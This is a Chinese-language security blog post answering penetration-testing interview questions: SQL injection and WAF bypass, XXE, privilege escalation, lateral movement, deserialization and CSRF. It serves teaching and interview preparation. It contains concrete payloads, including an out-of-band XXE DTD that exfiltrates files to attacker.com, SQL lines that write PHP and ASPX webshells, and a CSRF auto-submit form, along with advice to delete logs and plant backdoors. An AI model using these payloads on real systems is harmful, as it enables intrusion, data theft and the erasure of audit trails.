安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
2025年HW(护网面试) 46
1、自我介绍 2、owasp top10 漏洞你最熟悉那些 3、请下sql注入原理 ,盲注常用那些函数,绕waf的手段有那些 4、XXE原理,XXE实现过程,XXE页面没有回显怎么解决,XXE可以getshell不 5、完整的渗透思路 6、你知道Nmap那些参数 (三次握手是用哪个参数) 7、BURP 常用的模块 8、知道内网渗透吗?拿到webshell入侵内网第一步该干什么 9、sql如何写shell 10、知道那些提权的方式,怎么提权的 10、命令执行常用函数 11、反序列化函数,java反序列化 用那些类 12、CSRF 原理 怎么防御 ,渗透思路 平时怎么挖漏洞的
2. OWASP Top 10 漏洞熟悉点
- 注入漏洞(SQL/NoSQL/OS):数据库语句拼接导致的命令执行
- 失效的访问控制:越权访问(水平/垂直)、JWT 篡改
- XSS(跨站脚本):存储型危害最大,可窃取会话/钓鱼
- SSRF(服务端请求伪造):内网探测、云元数据利用
- XXE(XML外部实体):文件读取/内网探测(详见问题4)
- 反序列化漏洞:Java/PHP/.NET 对象构造触发RCE(详见问题11)
- 安全配置错误:默认凭证、目录列表、未更新补丁
3. SQL注入原理、盲注函数及WAF绕过
原理
攻击者通过篡改SQL查询结构,使应用执行恶意SQL语句(如
' OR 1=1--
绕过登录)。盲注常用函数
数据库类型 函数示例 MySQL SUBSTR()
,SLEEP()
,IF()
,BENCHMARK()
MSSQL WAITFOR DELAY '0:0:5'
,CHAR()
,PATINDEX()
Oracle UTL_HTTP.REQUEST
,DBMS_PIPE.RECEIVE_MESSAGE
绕WAF手段
- 混淆编码:Hex/Base64/Unicode(如
SELECT
→\x53\x45\x4C\x45\x43\x54
)- 注释分割:
SEL/**/ECT
,/*!50000SELECT*/
(MySQL版本特化)- 参数污染:
id=1&id=2' UNION SELECT
(利用后端解析差异)- 函数替代:
LIKE
替代=
,COALESCE()
替代空格- HTTP参数污染:多参数干扰WAF检测逻辑
4. XXE漏洞全解析
原理
XML解析器未禁用外部实体引用,导致恶意实体被解析。
实现过程
xml
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <data>&xxe;</data> <!-- 回显文件内容 -->
无回显解决方案(OOB外带)
- 构造带外通道:
xml
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd"> %dtd;
- evil.dtd 内容:
dtd
<!ENTITY % file SYSTEM "file:///secret.txt"> <!ENTITY % exfil "<!ENTITY % send SYSTEM 'http://attacker.com/?data=%file;'>"> %exfil;
GetShell可能性
- 条件苛刻:需目标环境支持
expect://
、jar://
等危险协议(PHP环境为主)- 实战案例:通过
file:///proc/self/cwd/
读取路径,结合上传漏洞实现RCE
5. 完整渗透思路(PTES标准流程)
- 信息收集
- 子域名爆破(Amass)、端口扫描(Nmap -sS)
- 指纹识别(Wappalyzer)、GitHub敏感信息泄露
- 漏洞扫描
- 主动扫描(Nessus/AWVS) + 手动验证(Burp Suite)
- 漏洞利用
- Web漏洞注入(SQLi/XSS/SSRF)
- 中间件漏洞(Tomcat RCE, Weblogic反序列化)
- 权限提升
- Linux:SUID/GTFOBins、内核提权(DirtyPipe)
- Windows:Token窃取、服务路径漏洞
- 内网横向移动
- 凭证抓取(Mimikatz)、SMB爆破(CrackMapExec)
- PTH(Pass-the-Hash)攻击
- 痕迹清除与报告
- 删除日志、上传清理脚本
6. Nmap常用参数
参数 用途 示例 -sS
SYN扫描(半开放扫描) nmap -sS 192.168.1.1
-sV
服务版本探测 nmap -sV -p 80,443
-O
操作系统识别 nmap -O 192.168.1.0/24
-A
全面扫描(含OS/版本/脚本) nmap -A target.com
-Pn
跳过主机发现(穿透防火墙) nmap -Pn 10.10.11.12
三次握手相关:
-sS
(SYN扫描)仅发送SYN包,不完成TCP连接,规避日志记录。
7. Burp Suite常用模块
模块 核心功能 Proxy 拦截/修改HTTP流量(Repeater重放请求) Intruder 自动化攻击(爆破密码、枚举参数) Scanner 自动漏洞扫描(需Pro版) Decoder 编解码工具(Base64/URL/Hex) Collaborator 检测盲注/SSRF(DNS/HTTP外带)
8. 内网渗透第一步:信息收集与权限稳固
- 主机信息:
ipconfig /all
(Windows) /ifconfig
(Linux)systeminfo
/uname -a
- 网络拓扑:
- 路由追踪:
tracert 8.8.8.8
- ARP表:
arp -a
- 权限维持:
- 添加后门账户 / Webshell持久化
- 部署C2通道(Cobalt Strike/Meterpreter)
- 凭证获取:
- 内存抓密码(Mimikatz)
- 配置文件搜索(数据库连接字符串)
9. SQL写Webshell方法
条件:数据库有文件写权限 + 知晓绝对路径
- MySQL:
sql
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
- MSSQL:
sql
EXEC sp_makewebtask 'C:\inetpub\wwwroot\shell.aspx', '<?% @Page Language="Jscript"%><%eval(Request.Item["cmd"])%>';
10. 提权方式及命令执行函数
提权方式
类型 方法 系统漏洞 Windows:PrintNightmare、EternalBlue Linux:DirtyCow、Polkit-pkexec (CVE-2021-4034) 配置错误 SUID程序滥用(find/cp)、sudoers错误配置 服务漏洞 MySQL UDF提权、Redis写SSH公钥 命令执行函数
语言 危险函数示例 PHP system()
,exec()
,passthru()
,shell_exec()
Java Runtime.getRuntime().exec()
Python os.system()
,subprocess.Popen()
11. 反序列化漏洞核心
反序列化函数
- PHP:
unserialize()
- Java:
ObjectInputStream.readObject()
- Python:
pickle.loads()
Java反序列化Gadget类
库/组件 利用链类示例 Commons-Collections InvokerTransformer
,ConstantTransformer
JDK AnnotationInvocationHandler
Groovy MethodClosure
Fastjson JdbcRowSetImpl
(JNDI注入)
12. CSRF漏洞与渗透技巧
原理
诱使用户在已登录状态下执行非预期操作(如转账
POST /transfer?to=hacker&amount=10000
)。防御方案
- Token验证:表单添加随机Token(同源策略保护)
- SameSite Cookie:设置
Strict
或Lax
模式- 验证Referer:检查请求来源域名
渗透思路
- 检测:Burp生成CSRF PoC,观察是否缺少Token/Referer检查
- 利用:
html
<form action="http://bank.com/transfer" method="POST"> <input type="hidden" name="to" value="hacker"> <input type="hidden" name="amount" value="10000"> </form> <script>document.forms[0].submit();</script>
漏洞挖掘方法
- 自动化扫描:Burp Suite + CSRF Scanner插件
- 手动测试:
- 删除Token参数观察是否仍可请求
- 替换Referer为其他域名测试
- 业务逻辑深挖:关注敏感操作(密码修改、邮箱绑定)